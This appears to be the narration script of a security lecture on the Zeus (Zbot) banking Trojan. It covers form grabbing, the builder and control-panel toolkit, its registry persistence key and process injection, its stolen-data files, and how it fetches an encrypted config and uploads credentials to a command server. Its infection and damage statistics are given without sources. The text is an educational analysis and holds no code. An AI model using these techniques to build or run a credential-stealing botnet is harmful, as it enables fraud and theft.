Zeus, also known as Zbot, is famous for stealing banking information by using man in the browser keystroke logging and form grabbing.
It is basically a proxy Trojan horse which uses man in the middle techniques to attack users. It attacks by exploiting vulnerabilities in the browser security to modify web pages and manipulate monetary transactions by changing or adding details that are malicious.
Form grabbing is a technique of capturing web form data in various browsers. Very recently Happy Hacker was arrested; he was alleged to be the mastermind behind the Zeus banking Trojan.
Change slide * Zeus comes as a toolkit to build and administer a botnet. It has a control panel that is used to monitor and update patches to the botnet. * It also has a so-called builder tool that allows the creation of executables that are used to infect the user computers. * Zeus comes as a commercial product for users who can buy it from underground markets and easily setup their own botnet. It is estimated to cost around $700 plus for the advanced versions.
Change Slide * Captures credentials over HTTP, HTTPS, FTP, POP3 * Has an integrated SOCKS proxy * Steals/deletes HTTP and flash cookies * Captures screenshots and scrapes HTML from target sites * Modifies the local hosts file * Groups the infected user systems into different botnets to distribute command and control * Has search capabilities which may be used through a web form * The configuration file is encrypted * Has a major function to kill the operating system * Has a unique bot identification string
Change Slide
Zeus is estimated to account for some 44% of the banking malware infections and has impacted an estimated 3.6 million computers in the U.S. alone. Its victims include more than 960 different banks with the latest reports indicating that it has infected almost 90% of Fortune 500 companies.
Zeus is estimated to have caused damages worth US$100 million since its inception. Alarmingly, up-to-date anti-virus programs are effective at blocking Zeus infections only 23 percent of the time. It is clear that traditional anti-virus software alone cannot be used to combat Zeus. Companies need to consider radical innovations in security to ensure protection from online fraud and to maintain customer goodwill.
Change Slide
Once the bot is executed, it copies itself to the locations as seen here with description “Trojan binary.”
To spawn this process every time on startup, it sets the Trojan binary path to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\winlogon\userinit.
It infects winlogon.exe and svchost.exe and adds malicious code to them.
As shown, the file local.ds/sysproc86.sys/audio.dll contains the data stolen from the user in the form of user credentials.
Change Slide
Once the clients are infected, they communicate with the command server through HTTP GET messages. This is mainly required to download the configuration file of the botnet on the victim system and then perform actions as per the settings of the configuration file. it replies back with the encrypted configurations file, mainly config.bin. This encrypted file is decrypted at the client end by the bot (using its secret key), which then parses the configuration file.
Once the configuration file is setup, the bot sends its gateway IP address (public IP address) to the command server. Once the communication is set up and the bot joins up the botnet, it starts posting up the victim’s private information on the assigned address from the configuration file. So all the financial information, credentials, and screenshots get uploaded to that secret address so they may then be used maliciously by the person running the botnet.
Change Slide
In Summary, Zeus bot is famous for stealing banking information by using man in the browser keystroke logging and form grabbing. Zeus comes as a toolkit to build and administer a botnet. Zeus is estimated to account for some 44% of the banking malware infections and has impacted an estimated 3.6 million computers in the U.S. alone. It is estimated to have caused $100 million dollars in damage. One of the criminals behind the Zbot has been captured the other is still at large today.